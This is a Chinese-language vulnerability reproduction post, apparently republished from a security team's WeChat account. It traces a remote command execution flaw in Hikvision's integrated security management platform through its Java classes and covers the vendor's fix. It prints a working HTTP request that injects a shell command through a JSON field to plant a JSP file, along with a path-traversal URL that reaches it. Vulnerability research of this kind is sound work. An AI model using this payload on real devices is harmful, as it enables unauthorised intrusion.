漏洞复现 综合安防 installation远程命令执行

admin 2024年6月10日22:55:13评论29 views字数 1973阅读6分34秒阅读模式

声明

本文作者:执着
本文字数:2077字

阅读时长:约5分钟

附件/链接:点击查看原文下载

本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。

狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

漏洞复现 综合安防 installation远程命令执行

海康威视部分综合安防管理平台历史版本由于接口校验不足,由于接口效验不完整导致其远程命令执行

漏洞细节

漏洞点位于

/webapps/center/WEB-INF/lib/hik-icd-installmanager-1.3.0-SNAPSHOT.jar!/com/hikvision/installmanager/controller/deployment/DeployController.class
漏洞复现 综合安防 installation远程命令执行

其中主要处理的逻辑函数在

t/webapps/center/WEB-INF/lib/hik-icd-installmanager-1.3.0-SNAPSHOT.jar!/com/hikvision/installmanager/service/deployment/impl/IInstallDetectServiceImpl.class
漏洞复现 综合安防 installation远程命令执行

简单看了一下整体逻辑,漏洞触发关键词和agnetNo有关系,有使用到agentNo到只有两个调用

漏洞复现 综合安防 installation远程命令执行

刚开始粗略的扫了一眼看逻辑应该都是一些查询类的东西,感觉太像能R,又不能动态调试那就一步一步的看吧,对应处理类在

/apache-tomcat/webapps/center/WEB-INF/lib/hik-icd-resource-1.3.0-SNAPSHOT.jar!/com/hikvision/resource/machine/service/impl/RMachineSelectorImpl.class
漏洞复现 综合安防 installation远程命令执行

继续跟进,对应处理类在

apache-tomcat/webapps/center/WEB-INF/lib/hik-icd-external-tool-1.3.0-SNAPSHOT.jar!/com/hikvision/externaltool/agent/service/impl/AgentTaskServiceImpl.class
漏洞复现 综合安防 installation远程命令执行

漏洞复现 综合安防 installation远程命令执行

看了一下没关系,继续下一步

apache-tomcat/webapps/center/WEB-INF/lib/hik-icd-external-tool-1.3.0-SNAPSHOT.jar!/com/hikvision/externaltool/agent/base/CommandConvertUtils.class
漏洞复现 综合安防 installation远程命令执行

最终RCE的地方,找到了,整个调用处理的过程清晰了,接下来就是构造利用RCE,结束下机

数据包

POST /center/api/installation/detection;.js  HTTP/1.1
Host: 192.168.52.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 346

{"type": "environment", "operate": "", "machines": {"id": "$(echo zhizhuo>/opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/123.jsp)"}}

漏洞复现 综合安防 installation远程命令执行

shell地址

/portal/ui/login/..;/..;/123.jsp

漏洞复现 综合安防 installation远程命令执行

修补错误

当然这个漏洞官方已经发布了新版本的修补

漏洞复现 综合安防 installation远程命令执行
这里的命令执行函数更换为executeCommandReceiveResultWithFileNoShell,具体在看看怎么实现的这个查询逻辑操作
漏洞复现 综合安防 installation远程命令执行

改成了一个编译好的应用程序去进行调用,算是给这条堵死了。

原文始发于微信公众号(WgpSec狼组安全团队):漏洞复现 综合安防 installation远程命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月10日22:55:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 综合安防 installation远程命令执行https://cn-sec.com/archives/2835631.html

发表评论

匿名网友 填写信息